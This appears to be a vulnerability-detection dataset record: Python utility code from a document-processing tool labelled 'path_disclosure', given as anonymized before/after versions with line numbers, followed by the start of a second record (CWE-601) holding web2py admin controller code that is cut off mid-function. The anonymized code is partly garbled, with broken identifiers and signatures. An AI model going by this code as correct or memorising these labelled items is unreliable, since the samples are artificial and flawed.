Splits a string of 1+ "for" values into an array of individual value.
Respects function args, etc.
Currently, for values are separated by commas.
"""
if forValues is None:
return None
forValues = re.sub(r"\s+", " ", forValues)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", forValues)
if value.strip()
]
def groupFromKey(key, length=2):
"""Generates a filename-safe "group" from a key, of a specified length."""
if key in _groupFromKeyCache:
return _groupFromKeyCache[key]
safeChars = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
group = ""
for char in key.lower():
if len(group) == length:
_groupFromKeyCache[key] = group
return group
if char in safeChars:
group += char
else:
group = group.ljust(length, "_")
_groupFromKeyCache[key] = group
return group
_groupFromKeyCache = {}
def flatten(arr):
for el in arr:
if (
isinstance(el, collections.Iterable)
and not isinstance(el, str)
and not lxml.etree.iselement(el)
):
yield from flatten(el)
else:
yield el
def scriptPath(*pathSegs):
startPath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
path = os.path.join(startPath, *pathSegs)
return path
def chrootPath(chrootPath, path):
chrootPath = os.path.abspath(chrootPath)
path = os.path.abspath(path)
if not path.startswith(chrootPath):
messages.die(f"Attempted to access a file ({path}) outside the source document's directory ({chrootPath}). See --allow-nonlocal-files.")
raise Exception()
else:
return path
def doEvery(s, action, lastTime=None):
# Takes an action every N seconds.
# Pass it the duration and the last time it took the action;
# it returns the time it last took the action
# (possibly just now).
# If you want to take action on first call,
# pass 0 as lastTime;
# otherwise it won't take action until N seconds.
import time
newTime = time.time()
if lastTime is None:
lastTime = newTime
if lastTime == 0 or newTime - lastTime > s:
action()
return newTime
return lastTime
| path_disclosure | {
"code": [
" return os.path.join(startPath, *pathSegs)"
],
"line_no": [
171
]
} | {
"code": [
"from .. import messages",
" path = os.path.join(startPath, *pathSegs)",
"def chrootPath(chrootPath, path):",
" path = os.path.abspath(path)",
" messages.die(f\"Attempted to access a file ({path}) outside the source document's directory ({chrootPath}). See --allow-nonlocal-files.\")",
" else:",
" return path"
],
"line_no": [
8,
174,
178,
180,
182,
184,
185
]
} | import collections
import os
import re
import lxml
def FUNC_0(VAR_0, VAR_1="or"):
VAR_0 = list(VAR_0)
if len(VAR_0) == 1:
return VAR_0[0]
if len(VAR_0) == 2:
return "{0} {2} {1}".format(VAR_0[0], VAR_0[1], VAR_1)
return "{0}, {2} {1}".format(", ".join(VAR_0[:-1]), VAR_0[-1], VAR_1)
def FUNC_1(VAR_2, VAR_3):
VAR_21 = iter(VAR_2)
yield next(VAR_21)
for x in VAR_21:
yield VAR_3
yield x
def FUNC_2(VAR_4, VAR_5, VAR_6):
for VAR_32, node in enumerate(VAR_4):
if VAR_32 % 2 == 0:
VAR_4[VAR_32 : i + 1] = FUNC_3(VAR_5, node, VAR_6)
return VAR_4
def FUNC_3(VAR_7, VAR_8, VAR_9=None):
VAR_22 = 0
VAR_23 = []
for match in VAR_7.finditer(VAR_8):
VAR_23.append(VAR_8[VAR_22 : match.start()])
if VAR_9:
VAR_23.append(VAR_9(match))
else:
VAR_23.append(match)
VAR_22 = match.end()
VAR_23.append(VAR_8[VAR_22:])
return VAR_23
def FUNC_4(VAR_10):
VAR_10 = VAR_10.strip().lower()
VAR_10 = re.sub(r"\(\)", "", VAR_10)
VAR_10 = re.sub(r"[\VAR_18/(,]+", "-", VAR_10)
VAR_10 = re.sub(r"[^a-z0-9_-]", "", VAR_10)
VAR_10 = VAR_10.rstrip("-")
return VAR_10
def FUNC_5(VAR_11):
from ..h import find, textContent
if VAR_11.get("data-lt") == "":
return []
elif VAR_11.get("data-lt"):
VAR_33 = VAR_11.get("data-lt")
if VAR_33 in ["|", "||", "|||"]:
VAR_24 = [VAR_33]
else:
VAR_24 = [x.strip() for x in VAR_33.split("|")]
else:
if VAR_11.tag in ("dfn", "a"):
VAR_24 = [textContent(VAR_11).strip()]
elif VAR_11.tag in ("h2", "h3", "h4", "h5", "h6"):
VAR_24 = [textContent(find(".content", VAR_11)).strip()]
if VAR_11.get("data-local-lt"):
VAR_31 = [x.strip() for x in VAR_11.get("data-local-lt").split("|")]
for VAR_10 in VAR_31:
if VAR_10 in VAR_24:
raise CLASS_0(VAR_10, VAR_24 + VAR_31, VAR_11)
VAR_24 += VAR_31
VAR_24 = [re.sub(r"\VAR_18+", " ", x) for x in VAR_24 if x != ""]
return VAR_24
class CLASS_0(Exception):
def __init__(self, VAR_25, VAR_26, VAR_11):
super().__init__()
self.offendingText = VAR_25
self.allTexts = VAR_26
self.el = VAR_11
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def FUNC_6(VAR_11):
try:
VAR_24 = FUNC_5(VAR_11)
except CLASS_0 as e:
VAR_24 = e.allTexts
return VAR_24[0] if len(VAR_24) > 0 else None
def FUNC_7(VAR_12):
if VAR_12 is None:
return None
VAR_12 = re.sub(r"\VAR_18+", " ", VAR_12)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", VAR_12)
if value.strip()
]
def FUNC_8(VAR_13, VAR_14=2):
if VAR_13 in VAR_15:
return VAR_15[VAR_13]
VAR_27 = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
VAR_28 = ""
for char in VAR_13.lower():
if len(VAR_28) == VAR_14:
VAR_15[VAR_13] = VAR_28
return VAR_28
if char in VAR_27:
VAR_28 += char
else:
VAR_28 = group.ljust(VAR_14, "_")
VAR_15[VAR_13] = VAR_28
return VAR_28
VAR_15 = {}
def FUNC_9(VAR_16):
for VAR_11 in VAR_16:
if (
isinstance(VAR_11, collections.Iterable)
and not isinstance(VAR_11, str)
and not lxml.etree.iselement(VAR_11)
):
yield from FUNC_9(VAR_11)
else:
yield VAR_11
def FUNC_10(*VAR_17):
VAR_29 = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
return os.path.join(VAR_29, *VAR_17)
def FUNC_11(VAR_18, VAR_19, VAR_20=None):
import time
VAR_30 = time.time()
if VAR_20 is None:
VAR_20 = VAR_30
if VAR_20 == 0 or VAR_30 - VAR_20 > VAR_18:
VAR_19()
return VAR_30
return VAR_20
| import collections
import os
import re
import lxml
from .. import constants
from .. import messages
def FUNC_0(VAR_0, VAR_1="or"):
VAR_0 = list(VAR_0)
if len(VAR_0) == 1:
return VAR_0[0]
if len(VAR_0) == 2:
return "{0} {2} {1}".format(VAR_0[0], VAR_0[1], VAR_1)
return "{0}, {2} {1}".format(", ".join(VAR_0[:-1]), VAR_0[-1], VAR_1)
def FUNC_1(VAR_2, VAR_3):
VAR_23 = iter(VAR_2)
yield next(VAR_23)
for x in VAR_23:
yield VAR_3
yield x
def FUNC_2(VAR_4, VAR_5, VAR_6):
for VAR_34, node in enumerate(VAR_4):
if VAR_34 % 2 == 0:
VAR_4[VAR_34 : i + 1] = FUNC_3(VAR_5, node, VAR_6)
return VAR_4
def FUNC_3(VAR_7, VAR_8, VAR_9=None):
VAR_24 = 0
VAR_25 = []
for match in VAR_7.finditer(VAR_8):
VAR_25.append(VAR_8[VAR_24 : match.start()])
if VAR_9:
VAR_25.append(VAR_9(match))
else:
VAR_25.append(match)
VAR_24 = match.end()
VAR_25.append(VAR_8[VAR_24:])
return VAR_25
def FUNC_4(VAR_10):
VAR_10 = VAR_10.strip().lower()
VAR_10 = re.sub(r"\(\)", "", VAR_10)
VAR_10 = re.sub(r"[\VAR_20/(,]+", "-", VAR_10)
VAR_10 = re.sub(r"[^a-z0-9_-]", "", VAR_10)
VAR_10 = VAR_10.rstrip("-")
return VAR_10
def FUNC_5(VAR_11):
from ..h import find, textContent
if VAR_11.get("data-lt") == "":
return []
elif VAR_11.get("data-lt"):
VAR_35 = VAR_11.get("data-lt")
if VAR_35 in ["|", "||", "|||"]:
VAR_26 = [VAR_35]
else:
VAR_26 = [x.strip() for x in VAR_35.split("|")]
else:
if VAR_11.tag in ("dfn", "a"):
VAR_26 = [textContent(VAR_11).strip()]
elif VAR_11.tag in ("h2", "h3", "h4", "h5", "h6"):
VAR_26 = [textContent(find(".content", VAR_11)).strip()]
if VAR_11.get("data-local-lt"):
VAR_33 = [x.strip() for x in VAR_11.get("data-local-lt").split("|")]
for VAR_10 in VAR_33:
if VAR_10 in VAR_26:
raise CLASS_0(VAR_10, VAR_26 + VAR_33, VAR_11)
VAR_26 += VAR_33
VAR_26 = [re.sub(r"\VAR_20+", " ", x) for x in VAR_26 if x != ""]
return VAR_26
class CLASS_0(Exception):
def __init__(self, VAR_27, VAR_28, VAR_11):
super().__init__()
self.offendingText = VAR_27
self.allTexts = VAR_28
self.el = VAR_11
def __unicode__(self):
return f"<Text '{self.offendingText}' shows up in both lt and local-lt>"
def FUNC_6(VAR_11):
try:
VAR_26 = FUNC_5(VAR_11)
except CLASS_0 as e:
VAR_26 = e.allTexts
return VAR_26[0] if len(VAR_26) > 0 else None
def FUNC_7(VAR_12):
if VAR_12 is None:
return None
VAR_12 = re.sub(r"\VAR_20+", " ", VAR_12)
return [
value.strip()
for value in re.split(r",(?![^()]*\))", VAR_12)
if value.strip()
]
def FUNC_8(VAR_13, VAR_14=2):
if VAR_13 in VAR_15:
return VAR_15[VAR_13]
VAR_29 = frozenset("abcdefghijklmnopqrstuvwxyz0123456789")
VAR_30 = ""
for char in VAR_13.lower():
if len(VAR_30) == VAR_14:
VAR_15[VAR_13] = VAR_30
return VAR_30
if char in VAR_29:
VAR_30 += char
else:
VAR_30 = group.ljust(VAR_14, "_")
VAR_15[VAR_13] = VAR_30
return VAR_30
VAR_15 = {}
def FUNC_9(VAR_16):
for VAR_11 in VAR_16:
if (
isinstance(VAR_11, collections.Iterable)
and not isinstance(VAR_11, str)
and not lxml.etree.iselement(VAR_11)
):
yield from FUNC_9(VAR_11)
else:
yield VAR_11
def FUNC_10(*VAR_17):
VAR_31 = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
VAR_19 = os.path.join(VAR_31, *VAR_17)
return VAR_19
def VAR_18(FUNC_11, VAR_19):
VAR_18 = os.path.abspath(VAR_18)
VAR_19 = os.path.abspath(VAR_19)
if not VAR_19.startswith(VAR_18):
messages.die(f"Attempted to access a file ({VAR_19}) outside the source document's directory ({VAR_18}). See --allow-nonlocal-files.")
raise Exception()
else:
return VAR_19
def FUNC_12(VAR_20, VAR_21, VAR_22=None):
import time
VAR_32 = time.time()
if VAR_22 is None:
VAR_22 = VAR_32
if VAR_22 == 0 or VAR_32 - VAR_22 > VAR_20:
VAR_21()
return VAR_32
return VAR_22
| [
4,
6,
7,
9,
16,
17,
24,
25,
34,
38,
39,
58,
59,
61,
63,
64,
65,
71,
72,
75,
93,
96,
99,
100,
107,
110,
111,
118,
119,
134,
135,
152,
153,
155,
156,
167,
168,
172,
173,
175,
176,
177,
178,
179,
180,
181,
183,
191,
27,
28,
29,
30,
31,
32,
41,
42,
43,
44,
45,
46,
121,
122,
123,
124,
125,
137
] | [
4,
6,
9,
10,
12,
19,
20,
27,
28,
37,
41,
42,
61,
62,
64,
66,
67,
68,
74,
75,
78,
96,
99,
102,
103,
110,
113,
114,
121,
122,
137,
138,
155,
156,
158,
159,
170,
171,
176,
177,
186,
187,
188,
190,
191,
192,
193,
194,
195,
196,
198,
206,
30,
31,
32,
33,
34,
35,
44,
45,
46,
47,
48,
49,
124,
125,
126,
127,
128,
140
] |
4CWE-601
| # -*- coding: utf-8 -*-
EXPERIMENTAL_STUFF = True
MAXNFILES = 1000
if EXPERIMENTAL_STUFF:
if is_mobile:
response.view = response.view.replace('default/', 'default.mobile/')
response.menu = []
import re
from gluon.admin import *
from gluon.fileutils import abspath, read_file, write_file
from gluon.utils import web2py_uuid
from gluon.tools import Config
from gluon.compileapp import find_exposed_functions
from glob import glob
from gluon._compat import iteritems, PY2, pickle, xrange, urlopen, to_bytes, StringIO, to_native, reload
import gluon.rewrite
import shutil
import platform
try:
import git
if git.__version__ < '0.3.1':
raise ImportError("Your version of git is %s. Upgrade to 0.3.1 or better." % git.__version__)
have_git = True
except ImportError as e:
have_git = False
GIT_MISSING = 'Requires gitpython module, but not installed or incompatible version: %s' % e
from gluon.languages import (read_possible_languages, read_dict, write_dict,
read_plural_dict, write_plural_dict)
if DEMO_MODE and request.function in ['change_password', 'pack',
'pack_custom', 'pack_plugin', 'upgrade_web2py', 'uninstall',
'cleanup', 'compile_app', 'remove_compiled_app', 'delete',
'delete_plugin', 'create_file', 'upload_file', 'update_languages',
'reload_routes', 'git_push', 'git_pull', 'install_plugin']:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if is_gae and request.function in ('edit', 'edit_language',
'edit_plurals', 'update_languages', 'create_file', 'install_plugin'):
session.flash = T('disabled in GAE mode')
redirect(URL('site'))
if not is_manager() and request.function in ['change_password', 'upgrade_web2py']:
session.flash = T('disabled in multi user mode')
redirect(URL('site'))
if FILTER_APPS and request.args(0) and not request.args(0) in FILTER_APPS:
session.flash = T('disabled in demo mode')
redirect(URL('site'))
if not session.token:
session.token = web2py_uuid()
def count_lines(data):
return len([line for line in data.split('\n') if line.strip() and not line.startswith('#')])
def log_progress(app, mode='EDIT', filename=None, progress=0):
progress_file = os.path.join(apath(app, r=request), 'progress.log')
now = str(request.now)[:19]
if not os.path.exists(progress_file):
safe_open(progress_file, 'w').write('[%s] START\n' % now)
if filename:
safe_open(progress_file, 'a').write(
'[%s] %s %s: %s\n' % (now, mode, filename, progress))
def safe_open(a, b):
if (DEMO_MODE or is_gae) and ('w' in b or 'a' in b):
class tmp:
def write(self, data):
pass
def close(self):
pass
return tmp()
if PY2 or 'b' in b:
return open(a, b)
else:
return open(a, b, encoding="utf8")
def safe_read(a, b='r'):
safe_file = safe_open(a, b)
try:
return safe_file.read()
finally:
safe_file.close()
def safe_write(a, value, b='w'):
safe_file = safe_open(a, b)
try:
safe_file.write(value)
finally:
safe_file.close()
def get_app(name=None):
app = name or request.args(0)
if (app and os.path.exists(apath(app, r=request)) and
(not MULTI_USER_MODE or is_manager() or
db(db.app.name == app)(db.app.owner == auth.user.id).count())):
return app
session.flash = T('App does not exist or you are not authorized')
redirect(URL('site'))
def index():
""" Index handler """
send = request.vars.send
if DEMO_MODE:
session.authorized = True
session.last_time = t0
if not send:
send = URL('site')
if session.authorized:
redirect(send)
elif failed_login_count() >= allowed_number_of_attempts:
time.sleep(2 ** allowed_number_of_attempts)
raise HTTP(403)
elif request.vars.password:
if verify_password(request.vars.password[:1024]):
session.authorized = True
login_record(True)
if CHECK_VERSION:
session.check_version = True
else:
session.check_version = False
session.last_time = t0
if isinstance(send, list): # ## why does this happen?
send = str(send[0])
redirect(send)
else:
times_denied = login_record(False)
if times_denied >= allowed_number_of_attempts:
response.flash = \
T('admin disabled because too many invalid login attempts')
elif times_denied == allowed_number_of_attempts - 1:
response.flash = \
T('You have one more login attempt before you are locked out')
else:
response.flash = T('invalid password.')
return dict(send=send)
def check_version():
""" Checks if web2py is up to date """
session.forget()
session._unlock(response)
new_version, version = check_new_version(request.env.web2py_version,
WEB2PY_VERSION_URL)
if new_version in (-1, -2):
return A(T('Unable to check for upgrades'), _href=WEB2PY_URL)
elif not new_version:
return A(T('web2py is up to date'), _href=WEB2PY_URL)
elif platform.system().lower() in ('windows', 'win32', 'win64') and os.path.exists("web2py.exe"):
return SPAN('You should upgrade to %s' % version.split('(')[0])
else:
return sp_button(URL('upgrade_web2py'), T('upgrade now to %s') % version.split('(')[0])
def logout():
""" Logout handler """
session.authorized = None
if MULTI_USER_MODE:
redirect(URL('user/logout'))
redirect(URL('index'))
def change_password():
if session.pam_user:
session.flash = T(
'PAM authenticated user, cannot change password here')
redirect(URL('site'))
form = SQLFORM.factory(Field('current_admin_password', 'password'),
Field('new_admin_password',
'password', requires=IS_STRONG()),
Field('new_admin_password_again', 'password'),
_class="span4 well")
if form.accepts(request.vars):
if not verify_password(request.vars.current_admin_password):
form.errors.current_admin_password = T('invalid password')
elif form.vars.new_admin_password != form.vars.new_admin_password_again:
form.errors.new_admin_password_again = T('no match')
else:
path = abspath('parameters_%s.py' % request.env.server_port)
safe_write(path, 'password="%s"' % CRYPT()(
request.vars.new_admin_password)[0])
session.flash = T('password changed')
redirect(URL('site'))
return dict(form=form)
def site():
""" Site handler """
myversion = request.env.web2py_version
# Shortcut to make the elif statements more legible
file_or_appurl = 'file' in request.vars or 'appurl' in request.vars
class IS_VALID_APPNAME(object):
def __call__(self, value):
if not re.compile('^\w+$').match(value):
return (value, T('Invalid application name'))
if not request.vars.overwrite and \
os.path.exists(os.path.join(apath(r=request), value)):
return (value, T('Application exists already'))
return (value, None)
is_appname = IS_VALID_APPNAME()
form_create = SQLFORM.factory(Field('name', requires=is_appname),
table_name='appcreate')
form_update = SQLFORM.factory(Field('name', requires=is_appname),
Field('file', 'upload', uploadfield=False),
Field('url'),
Field('overwrite', 'boolean'),
table_name='appupdate')
form_create.process()
form_update.process()
if DEMO_MODE:
pass
elif form_create.accepted:
# create a new application
appname = cleanpath(form_create.vars.name)
created, error = app_create(appname, request, info=True)
if created:
if MULTI_USER_MODE:
db.app.insert(name=appname, owner=auth.user.id)
log_progress(appname)
session.flash = T('new application "%s" created', appname)
gluon.rewrite.load()
redirect(URL('design', args=appname))
else:
session.flash = \
DIV(T('unable to create application "%s"', appname),
PRE(error))
redirect(URL(r=request))
elif form_update.accepted:
if (form_update.vars.url or '').endswith('.git'):
if not have_git:
session.flash = GIT_MISSING
redirect(URL(r=request))
target = os.path.join(apath(r=request), form_update.vars.name)
try:
new_repo = git.Repo.clone_from(form_update.vars.url, target)
session.flash = T('new application "%s" imported',
form_update.vars.name)
gluon.rewrite.load()
except git.GitCommandError as err:
session.flash = T('Invalid git repository specified.')
redirect(URL(r=request))
elif form_update.vars.url:
# fetch an application via URL or file upload
try:
f = urlopen(form_update.vars.url)
if f.code == 404:
raise Exception("404 file not found")
except Exception as e:
session.flash = \
DIV(T('Unable to download app because:'), PRE(repr(e)))
redirect(URL(r=request))
fname = form_update.vars.url
elif form_update.accepted and form_update.vars.file:
fname = request.vars.file.filename
f = request.vars.file.file
else:
session.flash = 'No file uploaded and no URL specified'
redirect(URL(r=request))
if f:
appname = cleanpath(form_update.vars.name)
installed = app_install(appname, f,
request, fname,
overwrite=form_update.vars.overwrite)
if f and installed:
msg = 'application %(appname)s installed with md5sum: %(digest)s'
if MULTI_USER_MODE:
db.app.insert(name=appname, owner=auth.user.id)
log_progress(appname)
session.flash = T(msg, dict(appname=appname,
digest=md5_hash(installed)))
gluon.rewrite.load()
else:
msg = 'unable to install application "%(appname)s"'
session.flash = T(msg, dict(appname=form_update.vars.name))
redirect(URL(r=request))
regex = re.compile('^\w+$')
if is_manager():
apps = [a for a in os.listdir(apath(r=request)) if regex.match(a) and
a != '__pycache__']
else:
apps = [a.name for a in db(db.app.owner == auth.user_id).select()]
if FILTER_APPS:
apps = [a for a in apps if a in FILTER_APPS]
apps = sorted(apps, key=lambda a: a.upper())
myplatform = platform.python_version()
return dict(app=None, apps=apps, myversion=myversion, myplatform=myplatform,
form_create=form_create, form_update=form_update)
def report_progress(app):
import datetime
progress_file = os.path.join(apath(app, r=request), 'progress.log')
regex = re.compile('\[(.*?)\][^\:]+\:\s+(\-?\d+)')
if not os.path.exists(progress_file):
return []
matches = regex.findall(open(progress_file, 'r').read())
events, counter = [], 0
for m in matches:
if not m:
continue
days = -(request.now - datetime.datetime.strptime(m[0],
'%Y-%m-%d %H:%M:%S')).days
counter += int(m[1])
events.append([days, counter])
return events
def pack():
app = get_app()
try:
if len(request.args) == 1:
fname = 'web2py.app.%s.w2p' % app
filename = app_pack(app, request, raise_ex=True)
else:
fname = 'web2py.app.%s.compiled.w2p' % app
filename = app_pack_compiled(app, request, raise_ex=True)
except Exception as e:
pferror = e
filename = None
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error: %s', pferror)
redirect(URL('site'))
def pack_plugin():
app = get_app()
if len(request.args) == 2:
fname = 'web2py.plugin.%s.w2p' % request.args[1]
filename = plugin_pack(app, request.args[1], request)
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error')
redirect(URL('plugin', args=request.args))
def pack_exe(app, base, filenames=None):
import urllib
import zipfile
# Download latest web2py_win and open it with zipfile
download_url = 'http://www.web2py.com/examples/static/web2py_win.zip'
out = StringIO()
out.write(urlopen(download_url).read())
web2py_win = zipfile.ZipFile(out, mode='a')
# Write routes.py with the application as default
routes = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % app
web2py_win.writestr('web2py/routes.py', routes.encode('utf-8'))
# Copy the application into the zipfile
common_root = os.path.dirname(base)
for filename in filenames:
fname = os.path.join(base, filename)
arcname = os.path.join('web2py/applications', app, filename)
web2py_win.write(fname, arcname)
web2py_win.close()
response.headers['Content-Type'] = 'application/zip'
response.headers['Content-Disposition'] = 'attachment; filename=web2py.app.%s.zip' % app
out.seek(0)
return response.stream(out)
def pack_custom():
app = get_app()
base = apath(app, r=request)
def ignore(fs):
return [f for f in fs if not (
f[:1] in '#' or f.endswith('~') or f.endswith('.bak'))]
files = {}
for (r, d, f) in os.walk(base):
files[r] = {'folders': ignore(d), 'files': ignore(f)}
if request.post_vars.file:
valid_set = set(os.path.relpath(os.path.join(r, f), base) for r in files for f in files[r]['files'])
files = request.post_vars.file
files = [files] if not isinstance(files, list) else files
files = [file for file in files if file in valid_set]
if request.post_vars.doexe is None:
fname = 'web2py.app.%s.w2p' % app
try:
filename = app_pack(app, request, raise_ex=True, filenames=files)
except Exception as e:
filename = None
if filename:
response.headers['Content-Type'] = 'application/w2p'
disposition = 'attachment; filename=%s' % fname
response.headers['Content-Disposition'] = disposition
return safe_read(filename, 'rb')
else:
session.flash = T('internal error: %s', e)
redirect(URL(args=request.args))
else:
return pack_exe(app, base, files)
return locals()
def upgrade_web2py():
dialog = FORM.confirm(T('Upgrade'),
{T('Cancel'): URL('site')})
if dialog.accepted:
(success, error) = upgrade(request)
if success:
session.flash = T('web2py upgraded; please restart it')
else:
session.flash = T('unable to upgrade because "%s"', error)
redirect(URL('site'))
return dict(dialog=dialog)
def uninstall():
app = get_app()
dialog = FORM.confirm(T('Uninstall'),
{T('Cancel'): URL('site')})
dialog['_id'] = 'confirm_form'
dialog['_class'] = 'well'
for component in dialog.components:
component['_class'] = 'btn'
if dialog.accepted:
if MULTI_USER_MODE:
if is_manager() and db(db.app.name == app).delete():
pass
elif db(db.app.name == app)(db.app.owner == auth.user.id).delete():
pass
else:
session.flash = T('no permission to uninstall "%s"', app)
redirect(URL('site'))
try:
filename = app_pack(app, request, raise_ex=True)
except:
session.flash = T('unable to uninstall "%s"', app)
else:
if app_uninstall(app, request):
session.flash = T('application "%s" uninstalled', app)
else:
session.flash = T('unable to uninstall "%s"', app)
redirect(URL('site'))
return dict(app=app, dialog=dialog)
def cleanup():
app = get_app()
clean = app_cleanup(app, request)
if not clean:
session.flash = T("some files could not be removed")
else:
session.flash = T('cache, errors and sessions cleaned')
redirect(URL('site'))
def compile_app():
app = get_app()
c = app_compile(app, request,
skip_failed_views=(request.args(1) == 'skip_failed_views'))
if not c:
session.flash = T('application compiled')
elif isinstance(c, list):
session.flash = DIV(*[T('application compiled'), BR(), BR(),
T('WARNING: The following views could not be compiled:'), BR()] +
[CAT(BR(), view) for view in c] +
[BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
else:
session.flash = DIV(T('Cannot compile: there are errors in your app:'),
CODE(c))
redirect(URL('site'))
def remove_compiled_app():
""" Remove the compiled application """
app = get_app()
remove_compiled_application(apath(app, r=request))
session.flash = T('compiled application removed')
redirect(URL('site'))
def delete():
""" Object delete handler """
app = get_app()
filename = '/'.join(request.args)
sender = request.vars.sender
if isinstance(sender, list): # ## fix a problem with Vista
sender = sender[0]
dialog = FORM.confirm(T('Delete'),
{T('Cancel'): URL(sender, anchor=request.vars.id)})
if dialog.accepted:
try:
full_path = apath(filename, r=request)
lineno = count_lines(open(full_path, 'r').read())
os.unlink(full_path)
log_progress(app, 'DELETE', filename, progress=-lineno)
session.flash = T('file "%(filename)s" deleted',
dict(filename=filename))
except Exception:
session.flash = T('unable to delete file "%(filename)s"',
dict(filename=filename))
redirect(URL(sender, anchor=request.vars.id2))
return dict(dialog=dialog, filename=filename)
def enable():
if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
app = get_app()
filename = os.path.join(apath(app, r=request), 'DISABLED')
if is_gae:
return SPAN(T('Not supported'), _style='color:yellow')
elif os.path.exists(filename):
os.unlink(filename)
return SPAN(T('Disable'), _style='color:green')
else:
if PY2:
safe_open(filename, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
else:
str_ = 'disabled: True\ntime-disabled: %s' % request.now
safe_open(filename, 'wb').write(str_.encode('utf-8'))
return SPAN(T('Enable'), _style='color:red')
def peek():
""" Visualize object code """
app = get_app(request.vars.app)
filename = '/'.join(request.args)
if request.vars.app:
path = abspath(filename)
else:
path = apath(filename, r=request)
try:
data = safe_read(path).replace('\r', '')
except IOError:
session.flash = T('file does not exist')
redirect(URL('site'))
extension = filename[filename.rfind('.') + 1:].lower()
return dict(app=app,
filename=filename,
data=data,
extension=extension)
def test():
""" Execute controller tests """
app = get_app()
if len(request.args) > 1:
file = request.args[1]
else:
file = '.*\.py'
controllers = listdir(
apath('%s/controllers/' % app, r=request), file + '$')
return dict(app=app, controllers=controllers)
def keepalive():
return ''
def search():
keywords = request.vars.keywords or ''
app = get_app()
def match(filename, keywords):
filename = os.path.join(apath(app, r=request), filename)
if keywords in read_file(filename, 'r'):
return True
return False
path = apath(request.args[0], r=request)
files1 = glob(os.path.join(path, '*/*.py'))
files2 = glob(os.path.join(path, '*/*.html'))
files3 = glob(os.path.join(path, '*/*/*.html'))
files = [x[len(path) + 1:].replace(
'\\', '/') for x in files1 + files2 + files3 if match(x, keywords)]
return response.json(dict(files=files, message=T.M('Searching: **%s** %%{file}', len(files))))
def edit():
""" File edit handler """
# Load json only if it is ajax edited...
app = get_app(request.vars.app)
app_path = apath(app, r=request)
preferences = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
config = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor', default_values={})
preferences.update(config.read())
if not(request.ajax) and not(is_mobile):
# return the scaffolding, the rest will be through ajax requests
response.title = T('Editing %s') % app
return response.render('default/edit.html', dict(app=app, editor_settings=preferences))
# show settings tab and save prefernces
if 'settings' in request.vars:
if request.post_vars: # save new preferences
if PY2:
post_vars = request.post_vars.items()
else:
post_vars = list(request.post_vars.items())
# Since unchecked checkbox are not serialized, we must set them as false by hand to store the correct preference in the settings
post_vars += [(opt, 'false') for opt in preferences if opt not in request.post_vars]
if config.save(post_vars):
response.headers["web2py-component-flash"] = T('Preferences saved correctly')
else:
response.headers["web2py-component-flash"] = T('Preferences saved on session only')
response.headers["web2py-component-command"] = "update_editor(%s);$('a[href=#editor_settings] button.close').click();" % response.json(config.read())
return
else:
details = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
details['plain_html'] = response.render('default/editor_settings.html', {'editor_settings': preferences})
return response.json(details)
""" File edit handler """
# Load json only if it is ajax edited...
app = get_app(request.vars.app)
filename = '/'.join(request.args)
realfilename = request.args[-1]
if request.vars.app:
path = abspath(filename)
else:
path = apath(filename, r=request)
# Try to discover the file type
if filename[-3:] == '.py':
filetype = 'python'
elif filename[-5:] == '.html':
filetype = 'html'
elif filename[-5:] == '.load':
filetype = 'html'
elif filename[-4:] == '.css':
filetype = 'css'
elif filename[-3:] == '.js':
filetype = 'javascript'
else:
filetype = 'html'
# ## check if file is not there
if ('revert' in request.vars) and os.path.exists(path + '.bak'):
try:
data = safe_read(path + '.bak')
data1 = safe_read(path)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return response.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
safe_write(path, data)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
safe_write(path + '.bak', data1)
response.flash = T('file "%s" of %s restored', (filename, saved_on))
else:
try:
data = safe_read(path)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return response.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
lineno_old = count_lines(data)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
if request.vars.file_hash and request.vars.file_hash != file_hash:
session.flash = T('file changed on disk')
data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
safe_write(path + '.1', data)
if 'from_ajax' in request.vars:
return response.json({'error': str(T('file changed on disk')),
'redirect': URL('resolve',
args=request.args)})
else:
redirect(URL('resolve', args=request.args))
elif request.vars.data:
safe_write(path + '.bak', data)
data = request.vars.data.replace('\r\n', '\n').strip() + '\n'
safe_write(path, data)
lineno_new = count_lines(data)
log_progress(
app, 'EDIT', filename, progress=lineno_new - lineno_old)
file_hash = md5_hash(data)
saved_on = time.ctime(os.stat(path)[stat.ST_MTIME])
response.flash = T('file saved on %s', saved_on)
data_or_revert = (request.vars.data or request.vars.revert)
# Check compile errors
highlight = None
if filetype == 'python' and request.vars.data:
import _ast
try:
code = request.vars.data.rstrip().replace('\r\n', '\n') + '\n'
compile(code, path, "exec", _ast.PyCF_ONLY_AST)
except Exception as e:
# offset calculation is only used for textarea (start/stop)
start = sum([len(line) + 1 for l, line
in enumerate(request.vars.data.split("\n"))
if l < e.lineno - 1])
if e.text and e.offset:
offset = e.offset - (len(e.text) - len(
e.text.splitlines()[-1]))
else:
